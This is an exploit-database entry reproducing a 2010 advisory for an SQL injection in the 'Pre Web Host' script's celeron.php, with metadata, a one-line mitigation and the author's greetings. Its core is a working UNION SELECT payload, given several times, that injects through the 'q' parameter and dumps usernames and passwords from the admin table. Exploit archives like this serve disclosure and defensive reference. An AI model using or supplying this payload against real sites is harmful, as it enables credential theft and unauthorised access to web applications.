header-logo
Suggest Exploit
vendor:
N/A
by:
Mr.Benladen
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Pre Web Host sql inj3ction Vulnerability

An attacker can inject malicious SQL queries into the vulnerable web application by manipulating the 'q' parameter of the 'celeron.php' script. For example, an attacker can send the following request to the vulnerable application: http://[site]/celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

# EDB-ID: 1310
# CVE: ()
# OSVDB-ID: ()
# Author: Mr.Benladen
# Published: 2010-06-07
# Verified: No
# Download: Exploit Code
# Download: N/A

[~]######################################### InformatioN
#############################################[~]

[~] Title     : Pre Web Host sql inj3ction Vulnerability
[~] Author    : Mr.Benladen
[~] Homepage  : http://www.joomlaservice.info Or http://www.dz4all.com
[~] Vendor    : http://www.hostfriendz.com/detail.php?spid=54
[~]           : 30$
[~] Email     : MaFiadu48@hotmail.fr
[~] Dork      : allinurl: In YoUr Dream


[~]#########################################??? ExploiT??
#############################################[~]

[~] For Exemple :

SQL iS hERE http://127.0.0.1/celeron.php?q=4sQL


http://127.0.0.1/celeron.php?q=-4+union+select+1,2,concat(username,0x3e,pass)+from+admin--


demo:
http://[site]/celeron.php?q=-4+union+select+1,2,concat%28username,0x3e,pass%29+from+admin--

[~]#########################################  ThankS To
############################################[~]

[~] Special Thanks To My Best FriendS :

Federal7 khallidmoro,dr.prorat,blackroot,Ra3ch,Zioon From ukarnia- and  all
Morocan hackerz

Big Gr33tz to anti tr4ck3r from www.sec-royal.com

[~] Morocan h4ckerz

[~]#########################################  FinisH :D
##############################

Navigation

Suggest Exploit

Services By CQR